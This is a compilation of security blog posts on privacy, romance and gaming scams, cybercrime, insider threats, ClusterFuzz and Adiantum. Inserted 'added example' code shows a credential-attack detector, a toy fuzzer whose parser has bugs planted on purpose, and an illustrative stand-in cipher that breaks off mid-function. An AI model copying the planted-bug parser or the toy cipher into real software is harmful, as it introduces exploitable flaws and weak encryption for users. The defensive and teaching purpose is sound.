We first meet Joe Goldberg and Guinevere Beck – the show’s lead characters – in a bookstore, she’s looking for a book, he’s a book clerk. They flirt, she buys a book, he learns her name. For all intents and purposes, this is where their story should end – but it doesn’t. With a simple search of her name, Joe discovers the world of Guinevere Beck’s social media channels, all conveniently set to public. And before we know it, Joe has made himself a figurative rear-window into Beck’s life, which brings to light the dangers of social media and highlights how a lack of digital privacy could put users in situations of unnecessary risk. With this information on Beck, Joe soon becomes both a physical and digital stalker, even managing to steal her phone while trailing her one day, which as luck would have it, is not password protected. From there, Joe follows her every text, plan and move thanks to the cloud.

Now, while Joe and Beck’s situation is unique (and a tad dramatized), the amount of data exposed via their interactions could potentially occur through another romantic avenue – online dating. Many millennial couples meet on dating sites where users are invited to share personal anecdotes, answer questions, and post photos of themselves. The nature of these apps is to get to know a stranger better, but the amount of personal information we choose to share can create security risks. We have to be careful as the line between creepy and cute quickly blurs when users can access someone’s every status update, tweet, and geotagged photo.

While “You” is an extreme case of social media gone wrong, dating app, social media, and cloud usage are all very predominant in 2019. Therefore, if you’re a digital user, be sure to consider these precautions:

  • Always set privacy and security settings. Anyone with access to the internet can view your social media if it’s public, so turn your profiles to private in order to have control over who can follow you. Take it a step further and go into your app settings to control which apps you want to share your location with and which ones you don’t.
  • Use a screen name for social media accounts. If you don’t want a simple search of your name on Google to lead to all your social media accounts, consider using a different variation of your real name.
  • Watch what you post. Before tagging your friends or location on Instagram and posting your location on Facebook, think about what this private information reveals about you publicly and how it could be used by a third-party.
  • Use strong passwords. In the chance your data does become exposed, or your device is stolen, a strong, unique password can help prevent your accounts from being hacked.
  • Leverage two-factor authentication. Remember to always implement two-factor authentication to add an extra layer of security to your device. This will help strengthen your online accounts with a unique, one-time code required to log in and access your data.
  • Use the cloud with caution. If you plan to store your data in the cloud, be sure to set up an additional layer of access security (one way of doing this is through two-factor authentication) so that no one can access the wealth of information your cloud holds. If your smartphone is lost or stolen, you can access your password protected cloud account to lock third-parties out of your device, and more importantly your personal data.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Roses Are Red, Violets Are Blue – What Does Your Personal Data Say About You? appeared first on McAfee Blogs.

The Business of Organised Cybercrime

Guest article by David Warburton, Senior Threat Research Evangelist, F5 Networks

Team leader, network administrator, data miner, money specialist. These are just some of the roles making a difference in today’s enterprises. The same is also true for sophisticated cybergangs.

Many still wrongly believe that the dark web is exclusively inhabited by hoodie-clad teenagers and legions of disaffected disruptors. The truth is, the average hacker is just a cog in a complex ecosystem more akin to that of a corporate enterprise than you think. The only difference is the endgame, which is usually to cause reputational or financial damage to governments, businesses and consumers.

There is no way around it; cybercrime is now run like an industry with multiple levels of deceit shielding those at the very top from capture. Therefore, it’s more important than ever for businesses to re-evaluate cybercriminal perceptions and ensure effective protective measures are in place.

Current perceptions surrounding Cybergangs

Cybergangs as a collective are often structured like legitimate businesses, including partner networks, resellers and vendors. Some have even set up call centres to field interactions with ransomware victims. Meanwhile, entry-level hackers across the world are embarking on career development journeys of sorts, enjoying opportunities to learn and develop skills. 

This includes the ability to write their own tools or enhance the capabilities of others. In many ways, it is a similar path to that of an intern. They often become part of sophisticated groups or operations once their abilities reach a certain level. Indeed, a large proportion of hackers are relatively new entrants to the cybercrime game and still use low-level tools to wreak havoc. This breed of cybercriminal isn’t always widely feared by big corporations. They should be.

How Cybergangs are using Technology to Work Smarter and Cheaper

Cybergangs often work remotely across widely dispersed geographies, which makes them tricky to detect and deal with. The nature of these structures also means that cyber attacks are becoming more automated, rapid and cost-effective. The costs and risks are further reduced when factoring in the fluidity and inherent anonymity of cryptocurrencies and the dark web.

The industry has become so robust that hackers can even source work on each link in an attack chain at an affordable rate. Each link is anonymous to other threat actors in the chain to vastly reduce the risk of detection.

IoT Vulnerabilities on the Rise

According to IHS Markit, there will be 125 billion IoT devices on the planet by 2030. With so much hype surrounding the idea of constant and pervasive connectivity, individuals and businesses are often complacent when it comes to ensuring all devices are secure.

Significantly, it is easier to compromise an IoT device that is exposed to the public Internet and protected with known vendor default credentials than it is to trick an individual into clicking on a link in a phishing email.

Consequently, it is crucial for organisations to have an IoT strategy in place that encompasses the monitoring and identification of traffic patterns for all connected devices. Visibility is essential to understand network behaviour and any potential suspicious activities that may occur on it.

Why Cybersecurity Mindsets must Change

IT teams globally have been lecturing staff for years on the importance of creating different passwords. Overall, the message is not resonating enough.

To combat the issue, businesses need to consider alternative tactics such as password manager applications, as well as ensuring continuous security training is available and compulsory for all staff.

It is worth noting that the most commonly attacked credentials are the vendor defaults for some of the most commonly used applications in enterprise environments. Simply having a basic system hardening policy that ensures vendor default credentials are disabled or changed before the system goes live will prevent this common issue from becoming a painful breach. System hardening is a requirement in every best practice security framework or compliance requirement.

Ultimately, someone with responsibility for compliance, audit, or security should be continually reviewing access to all systems. Commonly, security teams will only focus on systems within the scope of some compliance or regulatory obligation. This can lead to failure to review seemingly innocuous systems that can occasionally result in major breaches.

In addition to continual access reviews, monitoring should be in place to detect access attacks. Brute force attacks can not only lead to a breach, they can also result in performance impacts on the targeted system or lock customers out of their accounts. As a result, there are significant financial incentives for organisations to equip themselves with appropriate monitoring procedures.
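The monitoring described above can be surprisingly simple. The following is an added example, not code from the article or from F5: a sliding-window detector that reads authentication log lines and raises three kinds of alert, a burst of failures from one source (brute force), one source failing against many different usernames (password spraying) and, the one worth paging someone for, a success that follows a run of failures. The log format, the thresholds and the sample lines are all assumptions constructed for illustration.

```python
"""Credential-attack detection over authentication logs.

Added example, not part of the original article. The line format,
thresholds and sample log are constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed format: "<ISO-8601 time> auth <success|failure> user=<name> src=<ip>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth (?P<result>success|failure) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

WINDOW = timedelta(minutes=5)   # sliding window length (assumption)
FAIL_THRESHOLD = 5              # failures from one source inside WINDOW -> brute force
SPRAY_USERS = 3                 # distinct users failed from one source inside WINDOW -> spray
SUCCESS_AFTER = 3               # a success preceded by this many failures -> probable compromise


def parse(lines):
    """Parse log lines into events, oldest first; unparseable lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "result": m["result"],
                           "user": m["user"], "src": m["src"]})
    return sorted(events, key=lambda e: e["ts"])


def detect(lines):
    """Return (alert_type, src, detail) tuples in the order they fire."""
    alerts = []
    failures = defaultdict(list)   # src -> [(ts, user)] for failures still inside WINDOW
    flagged = set()                # (alert_type, src) already raised for the current window
    for ev in parse(lines):
        src, ts = ev["src"], ev["ts"]
        failures[src] = [(t, u) for t, u in failures[src] if ts - t <= WINDOW]
        if not failures[src]:
            flagged = {f for f in flagged if f[1] != src}   # window drained: re-arm alerts
        if ev["result"] == "failure":
            failures[src].append((ts, ev["user"]))
            users = {u for _, u in failures[src]}
            if len(failures[src]) >= FAIL_THRESHOLD and ("bruteforce", src) not in flagged:
                flagged.add(("bruteforce", src))
                alerts.append(("bruteforce", src, f"{len(failures[src])} failures within {WINDOW}"))
            if len(users) >= SPRAY_USERS and ("spray", src) not in flagged:
                flagged.add(("spray", src))
                alerts.append(("spray", src, f"{len(users)} distinct users tried: {sorted(users)}"))
        elif len(failures[src]) >= SUCCESS_AFTER:
            # One typo before a login is normal; a success after a burst of failures is not.
            alerts.append(("success_after_failures", src,
                           f"user={ev['user']} logged in after {len(failures[src])} failures"))
    return alerts


# Constructed sample log: a brute force that succeeds, a spray, a normal typo, and a stale retry.
SAMPLE_LOG = """\
2019-02-10T09:00:01 auth failure user=admin src=203.0.113.7
2019-02-10T09:00:02 auth failure user=admin src=203.0.113.7
2019-02-10T09:00:03 auth failure user=admin src=203.0.113.7
2019-02-10T09:00:04 auth failure user=admin src=203.0.113.7
2019-02-10T09:00:05 auth failure user=admin src=203.0.113.7
2019-02-10T09:00:06 auth failure user=admin src=203.0.113.7
2019-02-10T09:00:07 auth success user=admin src=203.0.113.7
2019-02-10T09:01:00 auth failure user=admin src=198.51.100.9
2019-02-10T09:01:05 auth failure user=root src=198.51.100.9
2019-02-10T09:01:10 auth failure user=guest src=198.51.100.9
2019-02-10T09:01:15 auth failure user=support src=198.51.100.9
2019-02-10T09:02:00 auth failure user=alice src=192.0.2.5
2019-02-10T09:02:10 auth success user=alice src=192.0.2.5
2019-02-10T09:30:00 auth failure user=admin src=203.0.113.7
2019-02-10T09:30:01 auth success user=admin src=203.0.113.7
this line does not match the format and is skipped
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(*alert)
```

Two design points worth noting: the single failed attempt by alice followed by her successful login produces nothing, because ordinary typos must not page anyone, and the admin attempt at 09:30 does not re-trigger the brute-force alert because the earlier failures have aged out of the window and the list re-arms. In production the same logic runs over a stream rather than a list, and the thresholds are tuned per system.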

Cybergangs use many different methods to wreak havoc, making it increasingly difficult to identify attacks in a timely manner. Businesses are often ignorant about the size of attacks, the scope of what has been affected, and the scale of the operation behind them. You are operating in the dark without doing the utmost to know your enemy. Failing to do so will continue to put information, staff and customers at risk by allowing cybergangs to operate in the shadows.
David Warburton, Senior Threat Research Evangelist with F5 Labs with over 20 years’ experience in IT and security.

Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account

It’s hard to believe that as savvy as we’ve become about our tech, people are still getting catfished, scammed, and heartbroken in their pursuit of love online.

The dinner conversation between bystanders goes something like this: “How could anyone be so dumb? Seriously? If they are going to be that reckless and uninformed, then maybe they deserve what they got!”

Some friends and I recently had a similar conversation about online dating scams. I noticed, however, that one friend, Sarah*, wasn’t so eager to jump into the conversation. She shrunk back in the booth and quietly sipped her margarita. Only later did she share her story with me.

The power of love

Sarah, a single mom in her late 40s, well-educated and attractive, had been persuaded by her teenager to join a dating site the year before. She was especially lonely after her divorce three years earlier, so she agreed to create a profile on a popular dating app. After a handful of dates fell flat, she found Scott. He was charismatic and kind. “We had an instant connection,” according to Sarah. They spent hours on the phone sharing their deepest secrets and even started imagining a future together. But after about three months, Scott fell on hard times. At first, he needed to borrow $400 to pay for airfare to visit a dying relative, which he paid back immediately. Over the next few months, the numbers grew to $1,000 for rent and $3,000 for a business venture.

Before long, Sarah had loaned her new love over $8,500. When she pressed him to repay the money, Scott ghosted Sarah online, moved out of town, and she never saw him again. My friend didn’t share her story with many people. She didn’t report it. She was too embarrassed and humiliated and even became depressed following what she calls “the Scott scam.” Her trust in other people and in love itself has been obliterated.

Sarah’s story is not the story of desperate, clueless people, or of lonely older women. Scammers are targeting good people who still believe in and value love and companionship. The pursuit of love online extends to adults as well as teens.

Confidence Fraud

Law enforcement calls these kinds of online romance scams confidence fraud because scammers will take a considerable amount of time gaining the trust and confidence of their victims. They will appear empathetic and supportive as they gather personal information they can use over time to carry out their scam.

According to the Federal Bureau of Investigation (FBI) confidence fraud has jumped 20% in the past year despite reports and warnings — especially around this time of year.

The FBI’s Internet Crime Complaint Center (IC3) reports that romance scams top all other financial online crimes. In 2016, people reported almost 15,000 romance scams to IC3 (nearly 2,500 more than the previous year), with losses exceeding $230 million.

Tips for Safe Online Dating

Never send money. Be it a romantic relationship you’ve engaged with or a phishing email, no matter the sob story, do not send money to anyone online. If you do send money, put a loan agreement in place that is legally enforceable should one party default.

Suspicious behavior. If someone promises to meet you somewhere but keeps canceling or if he or she refuses to video chat, those are red flags. Technology means anyone from anywhere in the world can successfully maintain a scam.

Take things slow. If someone is pushing the pace of a relationship or too quick to declare love and talk about the future, pause and assess the situation.

Do a background check. Love is a powerful force and can easily cloud a person’s correct understanding of reality. If you dare to create a dating profile, make a deal with yourself that you will extend the same courage to doing a background check on someone.

Be a sleuth. Don’t be afraid to gather facts on someone you’ve met online. Simple steps such as Googling the person’s name or dropping their photo in Google’s Reverse Image Search will help you get a better understanding of a person. Have faith: Good, legitimate people do exist. However, if there’s anything dubious, it’s best to find it out earlier rather than later. Part of doing your homework is tracking down mutual friends and making inquiries about the person you are talking with online.

Keep your social profiles private. Experts agree that you should edit your online footprint before you start dating people you’ve met online. Making your Instagram, Twitter, and Facebook private will guard you against potential.

Never send racy photos. Some scammers gain the confidence of their victims with every intention of extorting them in the future. They will threaten to share any racy photos with your family, friends, or business associates. The best way to avoid this is to never, ever send racy photos to anyone.

Google yourself, restrict info. Google yourself to see if there are any digital breadcrumbs that give away your home address or phone number. If possible, delete or revise that info. Likewise, go through your social accounts and remove any personal information you’ve shared in the past. Digital stalking is a risk for people who date online so turn off GPS on your dating apps and make sure your profile information is vague. Even if you get comfortable online with others, never get too comfortable since apps have privacy loopholes that can easily be exploited by hackers.

Take solid precautions. Enlist at least one friend as your dating safety pal. This will be the person who knows where you are going, who you will be with, and the background of the person you are meeting. Ask that person to check in with you during the date, and carry pepper spray or a taser for physical protection. Go the extra step and turn on Friend Finder or a location app that allows your safety friend to track your whereabouts during a date.

*Names have been changed

The post Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account appeared first on McAfee Blogs.

Forcing the Adversary to Pursue Insider Theft

Jack Crook pointed me toward a story by Christopher Burgess about intellectual property theft by "Hongjin Tan, a 35 year old Chinese national and U.S. legal permanent resident... [who] was arrested on December 20 and charged with theft of trade secrets. Tan is alleged to have stolen the trade secrets from his employer, a U.S. petroleum company," according to the criminal complaint filed by the US DoJ.

Tan's former employer and the FBI allege that Tan "downloaded restricted files to a personal thumb drive." I could not tell from the complaint if Tan downloaded the files at work or at home, but the thumb drive ended up at Tan's home. His employer asked Tan to bring it to their office, which Tan did. However, he had deleted all the files from the drive. Tan's employer recovered the files using commercially available forensic software.

This incident, by definition, involves an "insider threat." Tan was an employee who appears to have copied information that was outside the scope of his work responsibilities, resigned from his employer, and was planning to return to China to work for a competitor, having delivered his former employer's intellectual property.

When I started GE-CIRT in 2008 (officially "initial operating capability" on 1 January 2009), one of the strategies we pursued involved insider threats. I've written about insiders on this blog before but I couldn't find a description of the strategy we implemented via GE-CIRT.

We sought to make digital intrusions more expensive than physical intrusions.

In other words, we wanted to make it easier for the adversary to accomplish his mission using insiders. We wanted to make it more difficult for the adversary to accomplish his mission using our network.

In a cynical sense, this makes security someone else's problem. Suddenly the physical security team is dealing with the worst of the worst!

This is a win for everyone, however. Consider the many advantages the physical security team has over the digital security team.

The physical security team can work with human resources during the hiring process. HR can run background checks and identify suspicious job applicants prior to granting employment and access.

Employees are far more exposed than remote intruders. Employees, even under cover, expose their appearance, likely residence, and personalities to the company and its workers.

Employees can be subject to far more intensive monitoring than remote intruders. Employee endpoints can be instrumented. Employee workspaces are instrumented via access cards, cameras at entry and exit points, and other measures.

Employers can cooperate with law enforcement to investigate and prosecute employees. They can control and deter theft and other activities.

In brief, insider theft, like all "close access" activities, is incredibly risky for the adversary. It is a win for everyone when the adversary must resort to using insiders to accomplish their mission. Digital and physical security must cooperate to leverage these advantages, while collaborating with human resources, legal, information technology, and business lines to wring the maximum results from this advantage.

How Online Gamers Can Play It Safe

Online gaming has grown exponentially in recent years, and scammers have taken note. With the industry raking in over $100 billion in 2017 alone[1], the opportunity to funnel some money off through fraud or theft has proven irresistible to the bad guys, leaving gamers at greater risk.

From malware and phishing scams, to phony game hacks, identity theft, and more, gamers of all stripes now face a minefield of obstacles online and in real life. So, if you’re going to play games, it’s best to play it safe.

Here’s what to look out for:

Dodgy Downloads

Gamers who play on their computer or mobile device need to watch out for dangerous links or malicious apps disguised as popular or “free” games. Hackers often use innocent-looking downloads to deliver viruses and spyware, or even sign you up for paid services, without your consent. In one prominent case, more than 2.6 million Android users downloaded fake Minecraft apps that allowed hackers to take control of their devices.

Researchers have even discovered a ransomware threat that targets gamers. TeslaCrypt was designed to encrypt game-play data until a ransom is paid. Originally distributed through a malicious website, it has since been circulating via spam.

And while it’s true that game consoles like PlayStation and Xbox aren’t as vulnerable to viruses, since they are closed systems, that doesn’t mean that their users don’t face other risks.

Social Scams

Players on any platform could wind up with malware sent directly from other players via chat messages. Some scammers use social engineering tricks, like inviting other players to download “helpful” tools that turn out to be malware instead. When you consider that 62% of kids play games where they speak to others, the odds of a risky interaction with a stranger seem quite real.

Players of the Origin and Steam services, for instance, were targeted by hackers posing as other players, inviting them to play on their teams. Over chat message, they suggested the players download an “audio tool” that turned out to be a keystroke logger, aimed at stealing their access credentials for the game.

Other social scams include malicious YouTube videos or websites, offering game bonuses and currency, for free.

Another widespread social threat is account takeover, or ATO for short. This is when a scammer hacks a real account in order to post spammy links, and scam messages that appear to come from a trusted contact. Some accounts, for games like League of Legends, have even been stolen and sold online for money because they boasted a high level, or rare skins.

Phishing

Finally, be on the lookout for phishing websites offering free games or bonuses, or phishing emails prompting you to log in to your account via a link that leads to a copycat gaming site. Often, these are designed to steal your login credentials or distribute fake games that contain malware.

Players of the wildly popular Fortnite, for example, have been particularly targeted. The latest phishing scam is aimed at stealing the third-party sign-in tokens that allow cybercriminals to access a user’s account, and the payment details associated with it.

So now that you know a little more about gaming threats, here’s how to win at playing it safe:

  1. Do Your Research—Before downloading any games from the Internet or app stores, make sure to read other users’ reviews first to see that they are safe. This also goes for sites that sell game hacks, credits, patches, or virtual assets typically used to gain rank within a game. Avoid illegal file-sharing sites and “free” downloads, since these are often peppered with malware. It’s always best to go for a safer, paid option from a reputable source.
  2. Play Undercover— Be very careful about sharing personal information, in both your profile information, and your chat messages. Private information, such as your full name, address, pet’s name, school, or work details, could be used to guess your account password clues, or even impersonate you. Consider playing under an alias.
  3. Be Suspicious—Since scammers use the social aspect of games to fool people, you need to keep your guard up when you receive messages from strangers, or even read reviews.
    Some YouTube and social media reviews are placed there to trick users into thinking that the game or asset is legitimate. Dig deep, and avoid looking for free hacks. Ask gamers you know in real life for recommendations that worked for them.
  4. Protect Yourself—Avoid using older versions of games, and make sure that games you do play are updated with patches and fixes. If you think a gaming account may already have been compromised, change your password immediately to something unique and complex. Safeguard your computers and devices from known and emerging threats by investing in comprehensive security software, and keep yourself up-to-date on the latest scams.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

[1]According to The 2017 Year In Review Report by SuperData

The post How Online Gamers Can Play It Safe appeared first on McAfee Blogs.

Open sourcing ClusterFuzz



[Cross-posted from the Google Open-Source Blog]

Fuzzing is an automated method for detecting bugs in software that works by feeding unexpected inputs to a target program. It is effective at finding memory corruption bugs, which often have serious security implications. Manually finding these issues is both difficult and time consuming, and bugs often slip through despite rigorous code review practices. For software projects written in an unsafe language such as C or C++, fuzzing is a crucial part of ensuring their security and stability.

In order for fuzzing to be truly effective, it must be continuous, done at scale, and integrated into the development process of a software project. To provide these features for Chrome, we wrote ClusterFuzz, a fuzzing infrastructure running on over 25,000 cores. Two years ago, we began offering ClusterFuzz as a free service to open source projects through OSS-Fuzz.

Today, we’re announcing that ClusterFuzz is now open source and available for anyone to use.

We developed ClusterFuzz over eight years to fit seamlessly into developer workflows, and to make it dead simple to find bugs and get them fixed. ClusterFuzz provides end-to-end automation, from bug detection, to triage (accurate deduplication, bisection), to bug reporting, and finally to automatic closure of bug reports.
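To make the loop concrete, here is an added example in miniature; it is not ClusterFuzz code or Google's. It mutates seed inputs, runs them against a constructed toy parser with two planted bugs, treats any unexpected exception as a crash (the Python stand-in for a sanitizer report) and deduplicates crashes by crash state, the exception type plus the innermost frame, the same idea ClusterFuzz applies to stack traces. It deliberately has no coverage feedback, which is exactly what engines like libFuzzer and AFL add and what makes them effective at ClusterFuzz's scale.

```python
"""Mutation fuzzing with crash deduplication, in miniature.

Added example, not ClusterFuzz code. The target format, its bugs and the
seed are constructed for illustration.
"""
import random
import traceback


def parse_record(data: bytes) -> list:
    """Toy format (constructed): [count] then count x [len][payload], then [checksum].

    Planted defects standing in for memory-safety bugs: field lengths are
    trusted (a read past the end raises IndexError) and a two-byte field is
    interpreted as a ratio without checking the divisor (ZeroDivisionError).
    A wrong checksum is an expected rejection and raises ValueError.
    """
    count, pos, fields = data[0], 1, []
    for _ in range(count):
        length = data[pos]                        # attacker-controlled, never bounded
        payload = data[pos + 1:pos + 1 + length]
        fields.append(payload[0] // payload[1] if length == 2 else payload)
        pos += 1 + length
    if data[pos] != sum(data[1:pos]) % 256:       # reads past the end when lengths lie
        raise ValueError("bad checksum")
    return fields


EXPECTED = (ValueError,)   # the target's own input validation, not a crash
INTERESTING = [0, 1, 2, 0x7F, 0x80, 0xFF]


def crash_signature(exc: BaseException) -> tuple:
    """Crash state used for deduplication: exception type plus the innermost frame.
    ClusterFuzz keys on the top frames of a crash's stack in the same spirit."""
    frame = traceback.extract_tb(exc.__traceback__)[-1]
    return (type(exc).__name__, frame.name, frame.lineno)


def run_one(data: bytes):
    """Run the target once; return a crash signature, or None if it handled the input."""
    try:
        parse_record(data)
    except EXPECTED:
        return None
    except Exception as exc:
        return crash_signature(exc)
    return None


def mutate(rng: random.Random, data: bytes) -> bytes:
    """One random mutation: interesting value, bit flip, byte insert or byte delete."""
    buf = bytearray(data) or bytearray(1)
    i, op = rng.randrange(len(buf)), rng.randrange(4)
    if op == 0:
        buf[i] = rng.choice(INTERESTING)
    elif op == 1:
        buf[i] ^= 1 << rng.randrange(8)
    elif op == 2:
        buf.insert(i, rng.randrange(256))
    elif len(buf) > 1:
        del buf[i]
    return bytes(buf)


def fuzz(seeds, iterations=3000, seed=1) -> dict:
    """Return {crash_signature: (hit_count, one_reproducer)} after `iterations` runs."""
    rng = random.Random(seed)
    corpus = list(seeds)
    crashes = {}
    for _ in range(iterations):
        data = mutate(rng, rng.choice(corpus))
        sig = run_one(data)
        if sig is not None:
            hits, repro = crashes.get(sig, (0, data))
            crashes[sig] = (hits + 1, repro)   # many inputs, one bug: keep a single reproducer
    return crashes


# Constructed valid seed: two fields ("abc" and the ratio 8/4) plus a correct checksum.
SEED = bytes([2, 3, 97, 98, 99, 2, 8, 4, 55])

if __name__ == "__main__":
    for sig, (hits, repro) in fuzz([SEED]).items():
        print(f"{hits:5d} x {sig}  reproducer={repro.hex()}")
```

Running it shows thousands of crashing inputs collapsing into a handful of signatures, one per crash site, each with a minimal reproducer attached; that collapse is the deduplication step the post refers to, and it is what keeps a fuzzer from filing the same bug a thousand times.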

ClusterFuzz has found more than 16,000 bugs in Chrome and more than 11,000 bugs in over 160 open source projects integrated with OSS-Fuzz. It is an integral part of the development process of Chrome and many other open source projects. ClusterFuzz is often able to detect bugs hours after they are introduced and verify the fix within a day.

Check out our GitHub repository. You can try ClusterFuzz locally by following these instructions. In production, ClusterFuzz depends on some key Google Cloud Platform services, but you can use your own compute cluster. We welcome your contributions and look forward to any suggestions to help improve and extend this infrastructure. Through open sourcing ClusterFuzz, we hope to encourage all software developers to integrate fuzzing into their workflows.

Get TotalAV Essential AntiVirus for $19.99 (80% off)

The term “computer virus” calls to mind imagery of pathogenic creepy-crawlies bringing down a device’s operating system, their flagella wriggling as they multiply into hordes that infiltrate its chips and wires. And while it’s true that our computers can be infected with literal biological bacteria like staphylococci, per Science Illustrated, the threat of malicious code and programs intent on corrupting data and files looms far larger: According to a recent study from the University of Maryland’s Clark School of Engineering, attacks on computers with internet access are virtually ceaseless, with an incident occurring every 39 seconds on average, affecting a third of Americans every year.


Introducing Adiantum: Encryption for the Next Billion Users



Storage encryption protects your data if your phone falls into someone else's hands. Adiantum is an innovation in cryptography designed to make storage encryption more efficient for devices without cryptographic acceleration, to ensure that all devices can be encrypted.

Today, Android offers storage encryption using the Advanced Encryption Standard (AES). Most new Android devices have hardware support for AES via the ARMv8 Cryptography Extensions. However, Android runs on a wide range of devices. This includes not just the latest flagship and mid-range phones, but also entry-level Android Go phones sold primarily in developing countries, along with smart watches and TVs. In order to offer low cost options, device manufacturers sometimes use low-end processors such as the ARM Cortex-A7, which does not have hardware support for AES. On these devices, AES is so slow that it would result in a poor user experience; apps would take much longer to launch, and the device would generally feel much slower. So while storage encryption has been required for most devices since Android 6.0 in 2015, devices with poor AES performance (50 MiB/s and below) are exempt. We've been working to change this because we believe that encryption is for everyone.

In HTTPS encryption, this is a solved problem. The ChaCha20 stream cipher is much faster than AES when hardware acceleration is unavailable, while also being extremely secure. It is fast because it exclusively relies on operations that all CPUs natively support: additions, rotations, and XORs. For this reason, in 2014 Google selected ChaCha20 along with the Poly1305 authenticator, which is also fast in software, for a new TLS cipher suite to secure HTTPS internet connections. ChaCha20-Poly1305 has been standardized as RFC7539, and it greatly improves HTTPS performance on devices that lack AES instructions.

However, disk and file encryption present a special challenge. Data on storage devices is organized into "sectors" which today are typically 4096 bytes. When the filesystem makes a request to the device to read or write a sector, the encryption layer intercepts that request and converts between plaintext and ciphertext. This means that we must convert between a 4096-byte plaintext and a 4096-byte ciphertext. But to use RFC7539, the ciphertext must be slightly larger than the plaintext; a little space is needed for the cryptographic nonce and message integrity information. There are software techniques for finding places to store this extra information, but they reduce efficiency and can impose significant complexity on filesystem design.

Where AES is used, the conventional solution for disk encryption is to use the XTS or CBC-ESSIV modes of operation, which are length-preserving. Currently Android supports AES-128-CBC-ESSIV for full-disk encryption and AES-256-XTS for file-based encryption. However, when AES performance is insufficient there is no widely accepted alternative that has sufficient performance on lower-end ARM processors.

To solve this problem, we have designed a new encryption mode called Adiantum. Adiantum allows us to use the ChaCha stream cipher in a length-preserving mode, by adapting ideas from AES-based proposals for length-preserving encryption such as HCTR and HCH. On ARM Cortex-A7, Adiantum encryption and decryption on 4096-byte sectors is about 10.6 cycles per byte, around 5x faster than AES-256-XTS.

Unlike modes such as XTS or CBC-ESSIV, Adiantum is a true wide-block mode: changing any bit anywhere in the plaintext will unrecognizably change all of the ciphertext, and vice versa. It works by first hashing almost the entire plaintext using a keyed hash based on Poly1305 and another very fast keyed hashing function called NH. We also hash a value called the "tweak" which is used to ensure that different sectors are encrypted differently. This hash is then used to generate a nonce for the ChaCha encryption. After encryption, we hash again, so that we have the same strength in the decryption direction as the encryption direction. This is arranged in a configuration known as a Feistel network, so that we can decrypt what we've encrypted. A single AES-256 invocation on a 16-byte block is also required, but for 4096-byte inputs this part is not performance-critical.
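
The construction just described is easier to see in code than in prose. The block below is an added example, not the Adiantum reference implementation: it keeps the shape of the mode (hash the tweak and everything but the last block into that last block, put the result through one block-cipher call, use that output as the stream-cipher nonce for the rest, hash again on the way out, all arranged as a Feistel network) but swaps in stand-ins so that it runs on a plain Python install. HMAC-SHA256 replaces the NH/Poly1305 hash, a small SHA-256 Feistel replaces the AES-256 block, XOR replaces the modular addition (as in HCTR), a 96-bit nonce is cut from C_M, and three independent keys are taken as given where Adiantum derives its subkeys from one. The ChaCha implementation is genuine and the round count is a parameter, so ChaCha12 is what it runs. It exists to show the wide-block property and its contrast with a bare stream cipher, not to protect data.

```python
"""Adiantum-style length-preserving wide-block encryption, as a toy.

Added example, not the Adiantum reference code. Stand-ins: HMAC-SHA256 for
NH/Poly1305, a SHA-256 Feistel for AES-256, XOR for modular addition, a
96-bit nonce cut from C_M, separate keys instead of derived subkeys.
Illustration only; do not use it to protect data.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def _quarter(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 7)

def chacha_keystream(key: bytes, nonce: bytes, length: int, rounds: int = 12) -> bytes:
    """ChaCha keystream, RFC 7539 state layout (256-bit key, 96-bit nonce); rounds=12 is ChaCha12."""
    assert len(key) == 32 and len(nonce) == 12 and rounds % 2 == 0
    out, counter = bytearray(), 0
    while len(out) < length:
        init = [0x61707865, 0x3320646E, 0x79622D32, 0x6B206574]
        init += list(struct.unpack("<8I", key)) + [counter] + list(struct.unpack("<3I", nonce))
        s = init[:]
        for _ in range(rounds // 2):           # one double round = column round + diagonal round
            _quarter(s, 0, 4, 8, 12); _quarter(s, 1, 5, 9, 13)
            _quarter(s, 2, 6, 10, 14); _quarter(s, 3, 7, 11, 15)
            _quarter(s, 0, 5, 10, 15); _quarter(s, 1, 6, 11, 12)
            _quarter(s, 2, 7, 8, 13); _quarter(s, 3, 4, 9, 14)
        out += struct.pack("<16I", *[(x + y) & MASK for x, y in zip(s, init)])
        counter += 1
    return bytes(out[:length])

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _hash(key: bytes, tweak: bytes, data: bytes) -> bytes:
    """16-byte keyed hash of (tweak, data); stand-in for Adiantum's NH + Poly1305 hash."""
    return hmac.new(key, struct.pack("<I", len(tweak)) + tweak + data, hashlib.sha256).digest()[:16]

def _block(key: bytes, block: bytes, decrypt: bool = False) -> bytes:
    """16-byte block cipher stand-in for AES-256: four Feistel rounds over 8-byte halves."""
    f = lambda i, half: hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]
    L, R = block[:8], block[8:]
    if not decrypt:
        for i in range(4):
            L, R = R, _xor(L, f(i, R))
    else:
        for i in reversed(range(4)):
            L, R = _xor(R, f(i, L)), L
    return L + R

def encrypt(keys, tweak: bytes, plaintext: bytes) -> bytes:
    kh, kb, ks = keys                                   # hash, block and stream keys
    PL, PR = plaintext[:-16], plaintext[-16:]           # all but the last block / the last block
    PM = _xor(PR, _hash(kh, tweak, PL))                 # first hash pass folds PL and the tweak into PR
    CM = _block(kb, PM)                                 # the single block-cipher call
    CL = _xor(PL, chacha_keystream(ks, CM[:12], len(PL)))   # nonce comes from CM, so every bit of PL matters
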